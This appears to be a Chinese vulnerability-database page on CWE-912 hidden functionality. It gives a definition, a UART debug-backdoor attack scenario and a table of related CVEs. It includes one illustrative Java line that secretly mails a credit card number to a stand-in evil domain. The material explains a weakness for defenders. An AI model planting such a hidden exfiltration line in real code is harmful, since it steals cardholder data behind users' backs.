CWE-912 隐藏功能 类弱点 73 条 CVE 漏洞汇总,含 AI 中文分析。
CWE-912 指隐藏功能漏洞,即软件包含未文档化、非规范且不易察觉的功能。攻击者常利用这些隐蔽入口执行未授权操作或植入恶意代码。开发者应通过严格的代码审查、最小权限原则及自动化测试,确保所有功能均符合设计规范并公开透明,从而消除潜在的安全隐患。
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
Attackers dump the code from the device and then perform reverse engineering to analyze the code. The undocumented, special-access features are identified, and attackers can activate them by sending specific commands via UART before secure-boot phase completes. Using these hidden features, attackers can perform reads and writes to memory via the UART interface. At runtime, the attackers can also execute arbitrary code and dump the entire memory contents.
| CVE ID | 标题 | CVSS | 风险等级 | Published |
|---|---|---|---|---|
| CVE-2017-20084 | JUNG Smart Visu Server 安全漏洞 — Smart Visu Server | 5.3 | Medium | 2022-06-22 |
| CVE-2017-20083 | JUNG Smart Visu Server 安全漏洞 — Smart Visu Server | 5.3 | Medium | 2022-06-22 |
| CVE-2017-20082 | JUNG Smart Visu Server 安全漏洞 — Smart Visu Server | 5.5 | Medium | 2022-06-22 |
| CVE-2021-4229 | ua-parser-js 安全漏洞 — ua-parser-js | 5.0 | Medium | 2022-05-24 |
| CVE-2021-24867 | WordPress plugin AccessPress 安全漏洞 — Frontend Post WordPress Plugin – AccessPress Anonymous Post | 9.4 | - | 2022-02-21 |
| CVE-2021-43987 | mySCADA myPRO 安全漏洞 — myPRO | 9.8 | Critical | 2021-12-23 |
| CVE-2020-28593 | amazon COSORI Smart 安全漏洞 — Cosori | 8.1 | - | 2021-04-15 |
| CVE-2021-25371 | Samsung SMR 安全漏洞 — Samsung Mobile Devices | 6.1 | Medium | 2021-03-26 |
| CVE-2020-3352 | Cisco Firepower Threat Defense (FTD) 安全漏洞 — Cisco Firepower Threat Defense Software | 5.5 | - | 2020-10-21 |
| CVE-2020-12504 | RocketLinx 安全漏洞 — P+F Comtrol RocketLinx | 9.8 | Critical | 2020-10-15 |
| CVE-2020-16204 | Red Lion N-Tron 安全漏洞 — N-Tron 702-W / 702M12-W | 9.8 | - | 2020-09-01 |
| CVE-2020-14487 | OpenClinic GA 安全漏洞 — OpenClinic GA | 9.4 | Critical | 2020-07-29 |
| CVE-2018-17919 | Xiongmai XMeye P2P Cloud Server 安全漏洞 — XMeye P2P Cloud Server | 8.2 | - | 2018-10-10 |
CWE-912(隐藏功能) 是常见的弱点类别,本平台收录该类弱点关联的 73 条 CVE 漏洞。